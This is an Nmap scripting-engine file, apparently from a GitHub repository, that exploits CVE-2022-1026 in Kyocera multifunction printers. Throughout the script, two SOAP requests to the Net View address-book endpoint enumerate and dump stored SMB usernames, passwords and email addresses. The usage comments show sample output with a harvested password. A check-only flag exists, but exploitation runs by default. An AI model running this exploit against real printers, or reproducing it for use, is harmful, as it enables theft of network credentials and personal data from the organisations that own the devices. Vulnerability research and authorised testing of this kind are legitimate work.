-
Notifications
You must be signed in to change notification settings - Fork 0
/
http-vuln-cve2022-1026.nse
157 lines (135 loc) · 5.55 KB
/
http-vuln-cve2022-1026.nse
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
local http = require("http")
local stdnse = require "stdnse"
local string = require "string"
description = [[
Recovers SMB credentials and Email addresses from the
address book of vulnerable Kyocera mutifunction printers.
Kyocera multifunction printers running vulnerable versions
of Net View unintentionally expose sensitive user information,
including usernames and passwords, through an insufficiently
protected address book export function.
Net view is ran by default over http or https on TCP ports 9090
or 9091 respectively. To specify a custom TCP port pass the
<code>kyocera.port</code> argument.
To only check for vulnerability and skip exploiting the target
host pass 'true' to the <code>kyocera.skipexploit</code> parameter.
]]
--@usage
--nmap --script=http-vuln-cve2022-1026 192.168.50.45
--@output
--Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-13 11:12 EDT
--Nmap scan report for PRINTER01.phrack.com (192.168.50.45)
--Host is up (0.030s latency).
--Not shown: 991 closed tcp ports (conn-refused)
--PORT STATE SERVICE
--80/tcp open http
--515/tcp open printer
--631/tcp open ipp
--9090/tcp open zeus-admin
--| http-vuln-cve2022-1026:
--| -- SMB Credentials
--| Username: phrack.com\scanmanager
--| Password: G48n4&##JJKL32$
--| -- Emails
--9100/tcp open jetdirect
--@usage
--nmap --script=http-vuln-cve2022-1026 --script-args kyocera.port=9090,kyocera.skipexploit=true 192.168.50.45
--@args kyocera.port specify alternative TCP port
--@args kyocera.skipexploit check if vulnerable but do not exploit
--@output
--Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-13 11:17 EDT
--Nmap scan report for PRINTER01.phrack.com (192.168.50.45)
--Host is up (0.028s latency).
--Not shown: 991 closed tcp ports (conn-refused)
--PORT STATE SERVICE
--80/tcp open http
--443/tcp open https
--515/tcp open printer
--631/tcp open ipp
--9090/tcp open zeus-admin
--|_http-vuln-cve2022-1026: VULNERABLE
--9100/tcp open jetdirect
author = "Shain Lakin"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"safe", "exploit", "vuln"}
portrule = function(host, port)
local port_number = tonumber(stdnse.get_script_args('kyocera.port')) or 9090
return port.number == port_number and port.protocol == "tcp"
end
action = function(host, port)
local url = "/ws/km-wsdl/setting/address_book"
local headers = {['Content-Type'] = 'application/soap+xml'}
local skip_exploit = stdnse.get_script_args('kyocera.skipexploit') or false
local post_data1 = [[
<?xml version="1.0" encoding="utf-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://www.w3.org/2003/05/soap-envelope"
xmlns:SOAP-ENC="http://www.w3.org/2003/05/soap-encoding"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing"
xmlns:xop="http://www.w3.org/2004/08/xop/include"
xmlns:ns1="http://www.kyoceramita.com/ws/km-wsdl/setting/address_book">
<SOAP-ENV:Header>
<wsa:Action SOAP-ENV:mustUnderstand="true">http://www.kyoceramita.com/ws/km-wsdl/setting/address_book/create_personal_address_enumeration</wsa:Action>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<ns1:create_personal_address_enumerationRequest>
<ns1:number>25</ns1:number>
</ns1:create_personal_address_enumerationRequest>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
]]
-- First POST request
local response1 = http.post(host, port.number, url, nil, {}, post_data1)
if not response1.status then
return("HTTP request failed")
end
local enumeration = string.match(response1.body, '<kmaddrbook:enumeration>([%d]+)<')
if not enumeration then
return("NOT VULNERABLE")
elseif skip_exploit then
return("VULNERABLE")
end
local post_data2 = [[
<?xml version="1.0" encoding="utf-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://www.w3.org/2003/05/soap-envelope"
xmlns:SOAP-ENC="http://www.w3.org/2003/05/soap-encoding"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing"
xmlns:xop="http://www.w3.org/2004/08/xop/include"
xmlns:ns1="http://www.kyoceramita.com/ws/km-wsdl/setting/address_book">
<SOAP-ENV:Header>
<wsa:Action SOAP-ENV:mustUnderstand="true">http://www.kyoceramita.com/ws/km-wsdl/setting/address_book/get_personal_address_list</wsa:Action>
</SOAP-ENV:Header>
<SOAP-ENV:Body>
<ns1:get_personal_address_listRequest><ns1:enumeration>]]..enumeration..[[</ns1:enumeration></ns1:get_personal_address_listRequest></SOAP-ENV:Body></SOAP-ENV:Envelope>
]]
-- Second POST request
local response2 = http.post(host, port.number, url, nil, {}, post_data2)
if not response2.status then
return("HTTP request failed")
end
stdnse.print_debug("Raw output:\n" .. response2.body)
-- Parse email addresses
local emails = {}
for email in string.gmatch(response2.body, '<kmaddrbook:address>(.-)</kmaddrbook:address>') do
if email ~= "" then
table.insert(emails, email)
end
end
-- Parse login credentials
local username = string.match(response2.body, '<kmaddrbook:login_name>(.-)</kmaddrbook:login_name>')
local password = string.match(response2.body, '<kmaddrbook:login_password>(.-)</kmaddrbook:login_password>')
if username and password then
local output = ("\n-- SMB Credentials:\nUsername: %s\nPassword: %s"):format(username, password)
if #emails > 0 then
output = output .. "\n-- Emails:\n" .. table.concat(emails,'\n')
end
return output
else
return "VULNERABLE but no data available"
end
end